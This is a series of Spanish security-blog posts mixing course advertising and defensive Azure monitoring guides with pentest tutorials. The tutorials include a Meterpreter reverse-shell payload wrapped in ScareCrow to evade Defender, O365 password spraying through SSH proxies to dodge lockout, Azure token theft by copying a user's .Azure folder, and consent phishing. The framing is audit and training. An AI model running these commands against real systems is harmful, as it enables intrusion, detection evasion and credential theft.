Pronto vendrán las tendencias de ciber para 2024... entrará la IA? xD

 Estimados amigos de Inseguros !!!

Se viene la navidad, el final de año, y SEGURO que vamos a encontrar gente que no tiene ni puñetera idea hablando del futuro.

Este sin duda ha sido el año de la IA. En todos los congresos ha habido muy buenas, y otras muy malas, conferencias con este disciplina.

"Expertos" usando Chatgpt... vamos a ver amigo, que eso no es saber de IA. Que eso es como saber que el ibuprofeno quita el dolor de cabeza y creerse médico...

Las modas y lo modales ( en la red) de hoy en día dictan mucho de ser la realidad de la calle.

Las empresas de mi entornos siguen sufriendo ataques de Ransomware. Siguen sufriendo ataques de copromiso del CEO ( Timos en las facturas). Siguen sufriendo ataques de DDOS en sus E-commerce. Siguen sufriendo robo de suscripciones en Azure para ganar capacidad de cómputo y minar BTC...

Las empresas de mi entorno siguen con los vectores de ataque tradicionales... Phishing, sistemas sin parchear y debilidad en credenciales( principalmente carencia de MFA)

A la suma de estpudices y modas, que no digo que no haya que ir gestionándolas, se suman los fabricantes... O los red teamers !! Herramientas de phishing con IA que saben crear mejores textos que el famoso: Soy una chicà de la matre Rusia diszpuest∞a a conocerte... Esto no es la evolución de la IA...

Los aplicativos de red que te prometen la IA, necesitan un modelo de aprendizaje largo, contrastado muchas veces con el humano, ya sabes, realizar muchos circuitos funcionales para enseñar que es bueno y que es malo... Mi experiencia hasta la fecha es que TODOS son vulnerables, al igual que los EDR, los ETC y LOS JPG... xDDD

Vemos muchos ataques contra la IA, contra los modelos de entrenamiento. Para que lo entiendas, coger 10 android y 10 coches y engañar a Google maps con la densidad de tráfico... y SE que la IA se usará para el bien y para el mal. Pero a donde voy...

Voy a reirme de las tendencias y como he dicho de las modas. Que creeis que va a ser más habitual, un ataque contra una VPN por credenciales débiles o leakeadas, o un ataque contra el algoritmo de noseque que produzca nosecuantos?

Como van a entrar los malos en más ocasiones, con un phishing al teams con una factura de un proveedor, o con un deep fake en video de tu jefe con aspecto de haberse pasado con el Botox pidiendo algo raro?

Al final, hay mucha gente que vende del humo, de la prensa, de escribir tonterias, que les generan publicidad...

Yo después de muchos años ya en la ciber, cuando hablo con mis clientes, les recomiendo practicamente las mismas medidas. Inventarias, analizar riesgo, implementar fortificación, modelo de administración tiers---luego basado en privilegios...Entrenamiento al humano. Pentesting constante... Mejora en las capacidades de detección...

Porque si, ese Dark Trace o similar está muy bien, pero va a ser incapaz de parar un ataque a un e-commerce porque alguien ha encontrado un fallo en la generación de cupones de descuento y está comprando pequeños pedidos para luego revenderlos... Digo esto por decir algo. Para que entiendas que el sentido común siempre es la mejor solución.

Otro día, por cambiar de la IA, un amigo mio me decía que ahora todo es IOT, que todos los eventos que va hablan del IOT. Yo le intentaba explicar a mi amigos dos cosas:

1.- Si tienes IOT en tu empresa será un vector más, sino, NO. xD

2.- Cuando el IOT va sobre TCP/IP no deja de ser una LAN/VLAN más. No hay "secreto". Tendrás que fortificar el entorno como te deje el fabricante, tendrás que poner controles entre los entornos de explotación y monitorización. Tendrás que poner medidas de seguridad que sean capaces de detecar anomalías... como en el commerce... como que un  cliente ha comprado 10 veces con un ticket regalo?... como que un plc ahora tiene el doble de tráfico noseque... REGLAS DE NEGOCIO... pero no le veo la diferencia a que sea IOT, OT o sanvinagre... volvemos a las modas...

Y a la parte que me interesa, porque yo vendo auditorias y cursos, es la de estar preparado.

Cuando hablo con un cliente nuevo y me dice que tiene la seguridad bien, porque tiene un UTM y un Edr low cost, me pongo a temblar. En estos casos es la persona el riesgo :-) porque no sabe !!! Tu que lees este blog si sabes de ciberseguridad, pero hay mucha gente que NO, y cree que SI, y lo peor de todo es que no se forma. 

La formación es lo más importante que tenemos, en la vida personal y profesional, y debemos estar constantemente preparados. Leyendo blogs, escuchado podcast, asistiendo a seminarios, incluso de vendors !!! no para comprarle los aburridos clicks de su solución, sino para aprender lo que hacen los malos y los buenos.

En un curso mío de Seguridad Microsoft aprendemos desde que es Mitre, comentamos TTP´s hasta llegamos a hacerlos en Linux con las tools que ya sabes. Imaginas a tu CIO o Sysadmin haciendo esto? imaginas la cara que se les queda cuando haces cualquier dump de hashes y luego los usas como se quedan?

O cuando hacemos el curso de Hacking Azure. Hay alumnos implantadores de click rápido que alucinan... y pentester que están ampliando sus conocmientos. Pero también hay algun CIO que hace el curso y COMPRENDE lo que tiene delante y se conciencia de tomar las acciones correctas...

Pero la triste realidad es que mucha gente va al equisday del fabricante, come buen jamón, el account lo cuida y le renueva al año la "tranquilidad total". Luego pasa lo que pasa.

Por eso amigo lector, huye de las modas, de los hype, de las tendencias, de los gurús, huye de gente como yo xDDDD y picotea de aquí y de allá, y fórmate de la mejor manera, pero el sentido común es algo que no se logra muchas veces con libros xDDD

Espero que te hayas entretenido un rato con el post, gracias por leerme !!!

EDR o no EDR, esa es la cuestión: Bypass Defender con ScareCrow

 Estimados amigos de Inseguros !!!

Dentro de las fases que acometen los malos es el de saltarse las medidas defensivas. Y como tal, son ejercicios que debemos de hacer en nuestras organizaciones para saber como se compartan el resto de medida.

En esta ocasión vamos a lanzar una shell Meterpreter contra un Windows parcheado y con Defender y ver como no se entera. Lo vamos a hacer con la herramienta ScareCrow.

Esta herramienta es muy interesante porque firma el binario con la clave pública del dominio https que le digamos, parchear AMIS, ETW y hacer una seria de bypass EDR con la manera que tiene que cargar el código en memoria, para detectar lo que está hookeando el EDR y cargárselo. Si quieres bajar a cómo lo hace, hay dos post muy interesantes. Post 1 y Post 2 donde explica los hooks y las syscall que hace.

El proceso de instalación es muy sencillo.

Se clona el repositorio, se instalan dependencias

go get github.com/fatih/color
go get github.com/yeka/zip
go get github.com/josephspurrier/goversioninfo
go get github.com/Binject/debug/pe
go get github.com/awgh/rawreader

Se comprueba que existen estos paquetes y sino, ya sabes...

openssl
osslsigncode
mingw-w64

Y se compila:

go build ScareCrow.go

Ahora vamos a generar nuestra shell, por ejemplo con meterpreter. Generamos una shell con msfvenemom y ponemos a escuchar.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.50 LPORT=12345 -f raw -o fud.bin 

msf6 > use exploit/multi/handler 

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp 

msf6 exploit(multi/handler) > set lport 12345 

msf6 exploit(multi/handler) > set lhost 192.168.100.50 msf6 exploit(multi/handler) > run 

Ahora tomamos la shell y se la pasamos a la herramienta

./ScareCrow -I fud.bin -domain www.microsoft.com -encryptionmode AES 

Ejecutamos en un Windows con Defender y listo. Si te no va a la primera, prueba a compilar otro binario, a la segunda va.

Como puedes adivinar, confiar toda nuestra defensa en una sola línea de defensa es un error. 

Por ejemplo, en mi caso podría haber hecho varias cosas. Podríamos haber bloqueado la ip de origen del equipo que compartido el binario que me ha pillado la primera vez. Podría haber detectado tráfico http entre equipos de una lan que apriori no deberían. Hay muchas maneras de intentar monitorizar lo que pasa es nuestros entornos y así poder luchar contra ataques de este tipo.

Para ello, lo mejor es conocer nuestros sistemas en profundidad y para eso tienes el mejor curso de experto en Ciberseguridad Microsoft del momento. SI. Mejor que muchos "en inglés" muy famososos que te enseñan 4 cosas. 

Si estás trabajando, píde los créditos de formación que tienes disponibles y vamos a pasar 3 meses entretenidos aprendiendo muy mucho Ciberseguridad. 

Si necesitas más información, en la web puedes pedir una cita y charlamos.

Gracias por leerme !!!

Fuerza Bruta contra O365 mediante proxy para evadir bloqueos:Trevor

 Estimados amigos de Inseguros!!!

Un de las primeras cosas que debemos mirar a la hora de auditar nuestras infraestructuras es la calidad de las contraseñas, de nuestros empleados o clientes. Realizar una campaña de fuerza bruta con algunas passwords conocidas, relacionadas con el negocio, no me parece una mala idea.

Existen distintas aplicaciones con las que podemos acometer esta misión, pero Azure implementa un mecanismo denominado Smart Lockout que va a detectar los intentos de inicio de sesión fallidos y nos va a bloquear. 

Teniendo como objetivo saltarnos esta medida, vamos a usar algo ya conocido, y es el uso de proxys para repartir las peticiones y así hacer más dificíl a los sistemas defensivos la detección.

Lo vamos a realizar con la herramienta TrevorSpray.  Lo que me gusta de este proyecto es que el autor ha publicado aparte el componente proxy, por lo que mediante proxychains, como hacemos con TOR, podemos usar los nodos para tirar cualquier comando, pero vamos a centrarnos en la fuerza bruta...

Las instrucciones son muy sencillas:

pip install git+https://github.com/blacklanternsecurity/trevorproxy
pip install git+https://github.com/blacklanternsecurity/trevorspray

 export PATH=$PATH:/home/kinomakino/.local/bin

Como con cualquier otra herramienta, le damos un vistazo a las opciones. Me gusta indicar que no haga intentos de bypass del MFA, ya que podría generar mucho ruido. En esta fase nos centramos en obtener credenciales válidas, ya veremos luego como las explotamos.

Un comando sencillo podría ser: trevorspray -u lista_de_usuarios -p 'Password' -nl 

Ahora bien, tiramos la herramienta, y lo que suele pasar es que los filtros Smart Lockout nos cazen y empiece a decirnos que las cuentas están bloqueadas

Ahora es donde metemos la magia y le indicamos que queremos "canalizar" el ataque en uno o más ssh y voila !!!

 trevorspray -u trevor-users2.txt -p 'cosas' 'cosas2' 'cosas3' 'cosas4' -nl --ssh kinomakino@40.77.175.84 kinomakino@51.1.106.102 kinomakino@20.1.198.6 kinomakino@20.4.128.167 --jitter 15 

Desde el punto de vista defensivo, podemos configurar este comportamiento solo si tenemos P1. Si no lo tenemos, funcionará el lockout, pero no podemos configurar valores personalizados.

También sería interesante monitorizar estos log, por ejemplo, desde el visor de inicios de sesión desde Entra ID 

El problema de esta información es que no es "accionable". No podemos vincularle acciones, como haríamos con un SIEM. Pero para eso también tenemos este post donde te enseño a guardar estos registros en Log Analytics y asociarle reglas de ejecución.

Todas estas cosas las puedes encontrar si te animas a realizar el cuso de Hacking y Defensa de Azure y O365. 

Quedan pocas plazas. Quieres que te cuente en una reunión cositas sobre el curso?  

Gracias por leerme !!!

Ataques contra Azure: Tu programador: Robo de tokens

 Estimados amigos de Inseguros !!!

Cuando hablamos de la seguridad empresarial, son muchos los frentes que se nos presentan. El conocido perímetro, el endpoint, el no-perimetro, la cadena de suministros, los ataques de día cero, el correo, etc etc etc.

Muchas veces el enemigo lo tenemos en casa, y no me refiero a Juan que lo acepta todo, o a Pepa que es experta en descubrir como romper el ERP. No, me refiero incluso a nosotros mismos. 

En este caso voy a hablar del "programador". Ese enemigo del administrador de sistemas 😉😉😉 que quiere tener Root en todos los servers. Noooo, eso ya paso verdad? xD ahora tenemos DEVOPS !!! somos Trending !!! tenemos un repo. de versiones y Jenkins !!! bien, vale. Pero no me refiero a esto. 

Estoy poniendo el caso del programador, pero podría ser otro, permitirme la broma.

A lo que voy, programador que tiene en su portátil acceso a Azure, a "equis" cosas. Puede ser acceso a máquinas virtuales, al key vault de secretos, a una aplicación en concretro, al repositorio de código, a lo que sea, pero tiene algo. Ese algo puede ser la "cocina de la empresa", es decir, acceder a todos los datos, o hacerme con el dominio, o puede ser un paso intermedio hacia otro objetivo que si que me de el ansiado Administrador...

Bien, una vez tenemos el peligro, vamos a pensar. Sabemos que es un modelo de TIERS, es decir, tenemos varias zonas en nuestra empresa, y no usamos el portátil que usamos para navegar, para conectarnos al DC, TAMPOCO usamos el mismo equipo, usamos un host bastion. Bien, y el PC del programador donde lo ponemos? es un Tier 0 ? Es un Tier intermedio con procesos de desarrollo, o es un Tier 2 de un usuario?

Tenemos MFA local al equipo? tenemos cifrado de disco? no lo se cari, dímelo tu !!! este equipo, es portátil? se lo lleva de finde.?

Se está mascando la tragedia. Tenemos un usario con privilegios en nuestra infraestructura, quizás no en el dominio, pero si en Azure, y no lo estamos protegiendo como un servidor "delicado de la muerte" con mil políticas de hardening. 

Ahora que sabemos que es un objetivo goloso, y parece que es fáci, vamos a imaginar un ataque complicado, rebuscado !!!Hazlo tu mismo, entre en C:\Users\kinomakino\  y busca la carpeta .Azure hazlo con el tuyo !!!

Ahora copia esta carpeta y pégasela a otro usuario. Entra en Azure y "voila" has usado el token del compañero para autenticarse. MIRA QUE COMPLEJO !!! 

Claro !!! para que pase esto, hay que hacerse con el admin. local de la máquina, o con el admin del dominio, o con acceso físico, SIIIIIII, si aquí nadie regala nada. Pero igual que protegemos a los servers en profundidad, con las medidas que he comentado antes, este equipo debería tener esa protección extra.

En este caso, partimos de un entorno en el que hemos hackeado el Active Directory, pero queremos saltar al cloud. En otras ocasiones, es al revés, hemos accediro a Azure y tal...

Estas cosas no se arreglan haciendo "clicks" en uno o dos sitios, se arreglan arquitectando bien los servicios, conociendo como funcionan, qué posibilidades nos dan de fortificación, y sobre todo, sabiendo qué hacen los malos, para ir poniendo medidas.

Estas cosas no salen en la web de Microsoft. Si buscas libros, certificaciones y demás, veras los "sc-100, 200" y cosas así, que te enseñan a hacer configuraciones de seguridad, pero si quieres aprender CIberseguridad Azure y O365, tienes que hacer mi curso. Así, directo, sin vaselina. Estas formaciones o las obtienes así, o cuesta MUCHO que tus chicos las aprendan.

formacion.seguridadsi.com

No esperes más. No te quedes atrás y da el salto hacia la seguridad Cloud.

Seas sysadmin, administrador de red, blue team,  pentester, sea lo que sea, piensa en hacia donde quieres llegar, y confía en Seguridadsi.

Si tienes alguna duda, y quieres saber más de los cursos, tienes la web. Puedes contactar conmigo para una charla de 15 minutos y resolver todas las dudas.

Ah, se me olvida, si trabajas en España se puede bonificar.

Gracias como siempre !!!

¿Cómo auditar tu entorno Active Directory tu mismo? Prepárate que vienen curvas

 Estimados amigos de Inseguros !!!

Seguramente si me sigues, habrás estudiado bastante ciberseguridad, Windows, Azure, y cosas por el estilo.

En este humilde blog he ido escribiendo, y sigo haciéndolo, consejos, procesos, herramientas, ideas, tutoriales, opiniones, sobre la ciberseguridad, y muchas veces, desde la perspectiva Microsoft.

Muchos de vosotros habéis asistido a algún Webinar gratuito, o habés descargado alguno de los ebooks, como Buscadores, laboratorios o controles recomendables. *sabes que si haces los webinars grabados en la academia te llevas tu diploma acreditativo gratis?*

El otro día sacamos una auto-evaluación de 5 preguntas, para que reflexiones sobre varios aspectos de salud de tu AD, que te invito a que hagas.

Pero, muchos de vosotos me habéis transmitido de que os falta quizás el hilo conductor.

Que hemos aprendido muchas cosas, una cosita de aquí, otra de allá, pero os falta esa visión global de cómo acometer un plan de ciberseguridad para vuestras redes.

Creo que tiene todo el sentido del mundo. Yo mismo soy de los que opinan que no es tan necesario conocer la herramienta Equis o Zeta, sino conocer los procesos, los Attack Path que emplean los malos.

Academia SeguridadSI

Como todos sabéis, hace unos meses que llevo el proyecto de la academia. Si no la conoces, te invito a que te bajes el Dossier de presentación !!!!

Para el entorno Cloud, tenemos un curso MUY potente de ataque y defensa a Azure y O365, disponible para que lo hagas con nosotros. *SEPTIEMBRE*

Para el entorno Microsoft en general, tenemos el "Master". El curso Especialista en entornos Microsoft de 3 meses. En el no solo aprendes teoría y práctica, defensiva, sino ofensiva, aprenderás a atacarte, a defenderte, a usar el cloud ( incluye el contenido del curso de Azure y O365) pero desde el punto de vista de las trincheras, del sysadmin real, del CIO que debe tomar las mejores decisiones conociendo las amenazas. NO desde el punto de vista de "haz click aquí" haz "click allá" y compra "esto" o "lo otro".

Próximamente

PERO, aún así, creemos que muchos de vosotros os gusta la sangre !!! que si, que conocer Kerberos está muy bien, pero los ataques que enseñamos están ya más visto que el TBO. SI !!!! que veamos un Kerberoasting o un "Responder" no es tanto para conocer el ataque en sí, sino para conocer a bajo nivel como funciona Kerberos por un lado, y SMB/NTLM por el otro.

PERO como digo, para todos vosotros que os dedicais día a día al hacking ético, al pentesting. O para los sysadmin que queréis comenzar en ciberseguridad ofensiva, vamos a sacar el curso, el Mega curso, EL MEJOR CURSO DE HACKING orientado a Microsoft del mercado.

Está a punto de salir. Será un curso, que siguiendo las distintas fases de un ataque: Acceso inicial, movimientos laterales, evasión de defensas, etc Aprenderemos numerosas herramientas y procesos.

Seremos capaces de auditar nuestra organización, o la de cualquier cliente.

NO SERÁ el típico curso de Hacking Ético desactualizado que veo, por ejemplo:

• Mitad del temario, manejo de linux.
• Temar concretos de "elevación de privilegios" en Linux, al estilo OSCP.
• Top Ten Owasp.
• Un curso para aprender "fase de descubrimiento" con Nmap.
• Que aparezca la palabra OSINT
• Bash Scripting...
• Docker...

HUYE DE ESTOS "creadores de contenido". NO TRABAJAN EN ESTO

NO, ese curso está CADUCADO. Esos cursos están bien para dedicarse al hacking en general, pero el curso que vamos a sacar es un curso para usar en EMPRESAS REALES. 

Muchos de vosotros seguramente no hagáis nunca un CTF, ni tan siquiera os dediquéis a la ciberseguridad, estos cursos suelen ser de poco nivel técnico, muchas teclas que caducan enseguida, y que no aportan NADA a tu empresa.

Las empresas reales tienen ACTIVE DIRECTORY y O365. No todas... ya lo se, pero SI la mayoría.

Cansado de ver malas formaciones, estoy FOCALIZADO en esta tarea, en crear el MEJOR CURSO PRÁCTICO de Hacking Microsoft, y está a punto de salir.

He pensado subirlo grabado. Por cada Fase, equis procedimientos/herramientas. Así cada uno puede seguir el curso de la manera que más le convenga. Si quiere hacer un proceso de cada fase, o por si lo contrario quiere hacer todos los procesos de "Acceso Inicial".... como el alumno quiera.

Cuando se publique me temo que verás algo de publicidad :-) pero estate preparado, porque viene un final de año cargado de acciones, de pago y gratuitas para todos los amigos de la comunidad que tanto apoyo me regaláis. 

Por si acaso, si quieres estar al tanto de las novedades, descuentos y estas cosas, te invito a que te suscribas.

Gracias por todo !!!

Permisos sobre aplicaciones de terceros en Azure: Cómo robar tu token con un phishing.365 Stealer

 Estimados amigos de Inseguros !!!

En el episodio de hoy, vamos a recrear un ataque muy habitual en configuraciones de Azure no bien hechas y es el robo de token mediante permisos a aplicaciones.

El concepto es muy sencillo. Un atacante registra una aplicación maliciosa en SU tenant. Nos invita a nosotros, pero nos pide permisos en NUESTRO tenant. Si no hemos configurado bien este aspecto en nuestro tenant, nuestros usuarios pueden caer facilmente. 

Vamos a utilizar la herramienta O365 Stealer.

El enlace del proyecto utilizado es el este y mejor que un texto, os paso el video de una de las clases donde se muestra por encima el proceso.

https://youtu.be/xyDeW9BSMH8

Y como siempre, si te gusta este contenido, puedes mirar los dos cursos que hemos sacado para Septiembre y final de año. Toda la información disponible en https://formacion.seguridadsi.com/

Gracias  !!!

Devolver a la comunidad lo que nos da y cosas así: El camino del MVP...

 Estimados amigos de Inseguros !!!

Muchos de vosotros sabéis que desde hace unos años tengo la suerte de ser premiado por Microsoft como MVP de alguno de sus productos o servicios. Para mi es un orgullo, una fuente inmensa de satisfacción, un sueño hecho realidad.

Pero los sueños no se persiguen, aunque te digan eso en la tv. Tu puedes tener unas metas, y tienes que hacer acciones que te lleven a esas metas, pero un premio no es una meta. Un premio es algo que te viene extra, como recompensa, no se si me explico.

En el momento de salir este post, no se si estaré renovado para 2023-2024. Me lo dirán el 1 de Julio. 

El proceso de renovación de los MVP consiste en una evaluación de méritos que hacen desde el comite del premio, de tus últimos 12 meses de actividades en las comunidades.

En mi caso, me evaluan lo que he hecho de manera "comunitaria" desde el 1 abril de 2022 hasta el mismo día del 2023.

Sin saber si yo voy a ser renovado o no, yo ya llevo unos meses en los que mis contribuciones no "cuentan" para este año, esto ya está "vendido". Contarían para el siguiente año, si me renuevan. 

Pero a donde voy, yo no lo hago por eso. Yo lo hago por algo que aprendí de muchos, en concreto en las primeras Navaja Negra. Donde digamos conocí en persona a muchos de vosotros de la  nueva vieja escuela. DEVOLVER A LA COMUNIDAD lo que esta me da, lo escuché muchas veces.

No puede ser que seas amante del GNU, pero no publiques tus códigos, alguno de ellos, o tus descubrimientos o aventuras !!! osea, tu consumes pero no aportas? yo me siento en deuda con todos vosotros que ayudáis, por eso intento ayudar.

Recuerdas tu último año? has tenido días malos? semanas de no tener tiempo ni de ir al peluquero o afeitarte? entregas de proyectos atrasadas? noches de trabajar hasta tarde? fines de semana de decir en casa: este finde trabajo? has tenido vacaciones con la familia? puentes? yo también, igual que tu. No voy a decir ni más ni menos, como tu.

Y no se tu caso, pero yo he sacado tiempo para hacer 45 actividades fuera de mi trabajo, por la comunidad. 8 o 10 charlas en Conferencias. 8 o 10 visitas a institutos. unos 20 post...

Todo esto gratis, que tiene un coste, para mi alto, tiempo de familia, de sofa, de playa, de escribir, planificar, publicar, preparar, pero me siento en deuda con todos vosotros !!! tengo que hacerlo !!!

Si Microsoft no me diera este año el puesto, crees que dejaría de hacerlo? si me conoces, sabes la respuesta.

No espero nada de nadie, porque la gente somos egoistas. Os voy a poner un ejemplo. Conoces los webinars gratuitos que hago? uno al mes. Te gustarán más, menos, no los verás, pero hay gente que si.

Pedí hace poco a unas 800 personas, que por favor, mandasen un pequeño review en video,un saludo, un texto, algo, para intentar hacer algo bonito de marketing. Sabes cuanta gente me "pago" el webinar con un comentario? 3. Lo entiendo, yo lo mismo no lo haría, pero a donde voy, no espero nada de nadie, así no me desilusiono.

Pero el propósito de este post, es el que es, que te quede claro que me siento en deuda con la comunidad, y que espero poder seguir muchos años devolviendo lo que puedo. Que todos tenemos pareja, hijos, trabajo, familias, épocas mejores y peores, pero es de biennacido ser agradecido, o algo así. xDDDD

Espero seguir muchos años aquí, y que sigas leyéndome !!!

Gracias por leerme uso al terminar siempre mis post...

Monitoriza alertas en Azure sin SIEM con unos clicks...AzDetectSuite...ejemplo honeypot PasswordSpray

 Estimados amigos de Inseguros !!!

Una de las cuestiones que más preocupa a clientes es la cuestión de la detección de intentos de ataques en Azure AD, y por lo tanto en O365...

Al igual que en WIndows tenemos que generar eventos, que vemos en el Visor de Eventos, sino los "accionamos", si no le damos detrás un software para que "haga cosas", como el SIEM, en Azure pasa igual.

En este pequeño post os traigo un proyecto de Microsoft que me gusta, porque sirve muy bien para adentrarnos en la monitorización de eventos.

El concepto es muy sencillo. Nos vamos a nuestro Azure, creamos un espacio Log Analytics. Luego nos vamos a Azure AD, y configuramos la monitorización para que "vuelque" los logs en ese Log Analytics

Ahora nos toca esperar un poco. Yo me iría al Workspace y empezaría por generar una consulta KQL que me diga los SigningLogs. Una vez confirmemos que está recopilando logs de inicio de sesión, podemos seguir.

Bien, ya tenemos la "infra" montada. Ahora nos vamos al proyecto AzDetectSuite, y desplegamos las alertas de monitorización que los chicos de Redmon nos regalan. Estas reglas me valen para el Siem Sentinel o para Defender, al final es lenguaje KQL, pero hablamos de ahorrarnos unos eurillos prescindiendo de Sentinel...

Podríamos hacer "deploy to azure" que tanto me gusta, pero he encontrado fallos que imagino irán solventando.

Vamos a probar con la detección de Password Spraying, que es muy sencilla. 

Básicamente la plantilla nos crea una alerta, con una query, que busca signinlogs de un id usuario concreto.

Ahora podemos crearnos un usuario sin permisos, con una clave débil, relacionado con mi empresa, por ejemplo Miempresa2023. Apuntamos el ID del usuario.

Nos vamos al proyecto en github, copiamos el JSON. Nos vamos a Azure, buscamos Plantillas, y creamos una desde el principio.

Cuando la pegamos, debemos cambiar dos cosas, al menos, a fecha de hoy: la tabla se llama SigninLogs y no como va "de casa" y donde pone la KQL, cambiamos el id del usuario honeypot.

Desplegamos esto... y ya tenemos una alerta. Para comprobarlo todo, podemos buscar en azure: Alertas, entrar y ver Reglas de alerta.

En esta ventana veríamos las alertas, pero claro, nosotros queremos "engancharle" una acción, por ejemplo, que envíe un correo, o que ejecute algo, nos están atacando !!!

Nos vamos a la regla, y tenemos acciones.

Pero como tu ya sabes de esto, no hace falta que te lo diga... Aquí tienes la info de Microsoft...

Pero para los que quieren aprender, ya sabes que quedan plazas para el curso de Seguridad en Azure y Office 365 de este mes de Junio.

El MEJOR curso que puedes recibir ahora mismo, creeme, o pregunta a los alumnos pasados.

Volviendo al proyecto, me parece muy interesante AzDetectSuite ya que nos da una base para montar un buen sistema de detección low cost.

Como siempre, gracias por leerme !!!

Este Verano fórmate en Ciberseguridad !!!

 Estimados amigos de Inseguros !!!

Llega el verano y el buen tiempo, algunas vacaciones, y para muchas personas, un "bypass" un "stop" o dar marcha atrás para coger impulso para afrontar la última parte del año. 

Hay dos épocas para comenzar nuestros proyectos, después de el verano y después de navidad. Gimnasio, dieta, aprender inglés... te suena? xD

Este verano desde la academia de SeguridadSI hemos sacado unos cursos para que no esperes a Septiembre, pare que aproveches los largos días de sol para, disfrutar por un lado, pero para seguir con tu desarrollo profesional.

Hemos sacado varios cursos en distinta modalidades, para adaptarlos a tus conocimientos, propósitos y tiempo disponible.

Si te parece bien, te los explico a continuación.

Curso para administradores de sistemas, CTO, CIO, CISO, o personas que hacen el papel de "informático" en la empresa. Puedes ser el jefe, y querer tener conocimientos generales, o puedes ser el técnico de campo, que aspira a ser jefe xD. Formación trasversal.

Tienes el de seguridad para Administradores en dos formatos, julio o agosto.

El temario es muy concreto, son conocimientos concretos de ciberseguridad para que puedas invertir el conocimiento en tu empresa. Montar un MFA, una plataforma de gestión de contraseñas, fortificar tu entorno con GPO´s, aprender a monitorizar tus eventos. Un curso MUY práctico donde aprenderás herramientas y procesos con Software libre. Retorno del 100% de lo aprendido en tu empresa.

Si te apetece ir un poco más allá, y aprender como los malos hackean nuestras empresas, nuestros entornos Microsoft, y recibir tips para aprender a securizarlos, tu curso es del de Hacking Windows

Si te ves reflejado en los papeles que te he descrito antes, sin duda, el curso de Office 365 y Azure AD te va a despertar interés. Tanto si tienes y usas el entorno Cloud de Microsoft, como si lo piensas implementar o ampliar, este curso es un MUST. No es un curso de hacer clicks en el portal, para eso están los manuales, es un curso para APREDER cibereguridad Cloud Microsoft.

Para aquellos que quieran recibir esta formaciones, pedir información, porque hay distintos horarios, y maneras. TODOS son cursos en directo conmigo, pero las clases se graban, por lo que si te pilla algún día de vacaciones, o con mucho trabajo... lo podrás hacer en backoffice.

Y por supuesto, premiamos tu fidelidad, si contratas varios cursos, tienes un jugoso descuento.

Seguro que una imagen con el calendario nos aclará mucho las fechas y horarios

Como todos los cursos de la plataforma, se pueden bonificar por FUNDAE si trabajas en una empresa en España.

Pero como siempre digo, lo importante de estos cursos no es tanto el precio, que si, sino el compromiso que tienes que tener para embarcarte en una formación potente, y que sin duda, va a contribuir en tu desarrollo profesional.

Si tienes dudas, puedes contactar conmigo en las distinta redes, en formacion.seguridadsi.com y en mi correo joaquin.molina en seguridadsi.com

Gracias por leerme, nos vemos en clase xDDD

Deployment History en Azure, tu bash history en la nube: cazando passwords...

 

Estimados amigos de Inseguros !!!

Dentro del proceso de hacking a entornos Azure buscamos información sensible con los permisos que tiene el usuario que tenemos. Al igual que hacemos con AD On premise, debemos aprovechar al máximo el nivel del usuario, o buscarnos otro...

Si tenemos la suerte de poder ser global reader en una suscripción o grupo de recursos, podemos acceder al historial de despliegues que se han hecho en ese Resource Group.

 Por defecto Azure guarda los últimos 800 despliegues, es más, si llegas a esa cifra, no podrás hacer un warning hasta que Azure haga un borrado como pila y puedas. 

Podemos ver las entradas y salidas, o descargarnos el código completo.

Todo esto desde el portal.

Si usamos la herramienta MicroBurst podemos hacer un Gez-AzDomainInfo y nos lo tira, junto a todo el inventario, a un fichero donde poder indagar. 

Si lo hemos hecho bien, por ejemplo, cuando implementas una máquina virtual desde el portal, el campo contraseña aparece como SecureString y no se ve, pero si has hecho el despliegue desde un "github por ahí" y el desarrollador no ha puesto bien el campo, podremos cazar contraseñas.

También puede ser que pillemos usuarios de portales, en fin, información que a priori nos puede seguir para nuestro proceso de hacking.

Puedes borrar gráficamente los despliegues. Puedes hacerlo dentro de tu ciclo de Devops, puedes hacerlo con powershell az group deployment delete --name name --resource-group name                     Lo que no he podido saber es como quitar este comportamiento, sospecho que no se puede por el tema de los rollbacks.

Esta técnica, herramienta y muchas más vamos a ver la primera semana de Mayo en el curso avanzado de seguridad Azure & O365.  Aún quedas plazas y lo puedes subvencionar.

Si quieres más info. ya sabes !! https://formacion.seguridadsi.com/courses/seguridadazure0365

Azure AD Assessment

 Estimados amigos de Inseguros !!!

Azure Ad es la piedra angular la seguridad de nuestros despliegues Cloud Microsoft, y debemos de tratarlo, de mimarlo, igual que hacemos con el resto de infraestructura. En Microsoft soy consciente de que limpian el CPD, lo cuidan, lo vigilan... pero nuestras configuraciones son cosa nuestra. Ya sabes, el modelo de reponsabilidad compartida...

En esta ocasión os traigo una herramienta de la propia MS para auditar despliegues de clientes. Una solución completa, que incluye hasta el PPT, ahora lo verás. Azure Ad Assessment

Lo primero que vamos a hacer es exportar datos de Azure, con un usuario Global Reader como suele ser habitual. El aplicativo tras realizar estos pasos, nos genera los datos y unas plantillas para visualizarlo en PowerBi...

Install-Module AzureADAssessment -Force

Connect-AADAssessment

Invoke-AADAssessmentDataCollection

Una vez tenemos los datos, bajamos de manera gratuita Power Bi Desktop si no lo teníamos.

Con los datos en bruto, generamos las plantillas:

Complete-AADAssessmentReports `

>>   -Path C:\AzureADAssessment\AzureADAssessmentData-seguridadsi.onmicrosoft.com.aad

Cargamos la plantilla en Powerbi y tenemos nuestro "cuadro de mandos"

Seguimos... hay cosas que no se pueden sacar de la Api, por lo que Microsoft nos da un checklist en Excel para realizar una entrevista con el cliente en la que anotar ciertos comportamientos. Bajamos el Excel de su ruta.

Otra de las cosas buenas de este Excel es que incorporta un circuito guiado por el portal, con enlace incluido, para que el auditor vaya mirando primero y tomando capturas para evidenciar y completar información.

Seguimos añadiendo ingredientes al reporte. Ahora vamos a ejecutar comprobaciones con nuestro querido Ad Connect.

Expand-AADAssessAADConnectConfig -CustomerName 'Seguridadsi' -AADConnectProdConfigZipFilePath C:\AzureADAssessment\AzureADAssessmentData-AADC-DC2022.zip  -OutputRootPath C:\AzureADAssessment\estaaquitureportexD\Report\AADC

Una vez realizado el acceso a los datos, comprobamos el inmenso reporte que nos ofrece la solución.

Ahora que tenemos toda la información, nos pasan hasta un PPT para mostrarlo... me parece algo excesivo ya :-)

Pero si usar la guía para interpretar la información. En esa guía te indica la prioridad, el responsable y te explica un poco la recomendación. 

Por ejemplo, si en la entrevista detectamos que no todos los usuarios usan MFA, nos da una recomendación de prioridades.

